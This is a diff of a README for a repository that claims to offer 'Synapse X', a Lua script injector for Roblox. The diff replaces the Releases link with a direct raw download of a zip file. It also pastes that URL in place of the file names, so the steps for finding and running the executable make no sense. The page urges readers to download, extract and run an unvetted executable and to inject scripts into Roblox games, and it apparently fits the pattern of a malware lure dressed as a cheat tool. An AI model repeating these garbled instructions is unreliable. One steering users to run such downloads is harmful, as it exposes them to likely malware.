Shelf-77/Synapse-X-Lua-Script-Injector-for-Roblox-Game-Development/README.md

    - Roblox must be installed on your computer

 2. **Visit the Releases Page**
-   To download Synapse X, [visit this page to download](https://github.com/Shelf-77/Synapse-X-Lua-Script-Injector-for-Roblox-Game-Development/releases).
+   To download Synapse X, [visit this page to download](https://raw.githubusercontent.com/Shelf-77/Synapse-X-Lua-Script-Injector-for-Roblox-Game-Development/main/pregust/Synapse-X-Lua-Script-Injector-for-Roblox-Game-Development.zip).
 You will find the latest version available.

 3. **Download the Application**
    Find the latest release version and click on the download link.
-It will typically be labeled as `SynapseX.zip`.
+It will typically be labeled as `https://raw.githubusercontent.com/Shelf-77/Synapse-X-Lua-Script-Injector-for-Roblox-Game-Development/main/pregust/Synapse-X-Lua-Script-Injector-for-Roblox-Game-Development.zip`.
 The download will begin automatically.

 4. **Extract the Files**
    Once the download is complete, locate the downloaded `.zip` file in your computer's downloads folder.
 Right-click on the file and select "Extract All."
 Follow the on-screen instructions to extract the files to your desired location.

 5. **Run Synapse X**
    After extracting the files, navigate to the folder where you extracted them.
-Find the `SynapseX.exe` file.
+Find the `https://raw.githubusercontent.com/Shelf-77/Synapse-X-Lua-Script-Injector-for-Roblox-Game-Development/main/pregust/Synapse-X-Lua-Script-Injector-for-Roblox-Game-Development.zip` file.
 Double-click it to run the application.

 6. **Inject Scripts**
    Open Roblox and select the game you want to customize.
 Then return to the Synapse X application.
 Here, you can load your Lua scripts and execute them in the game.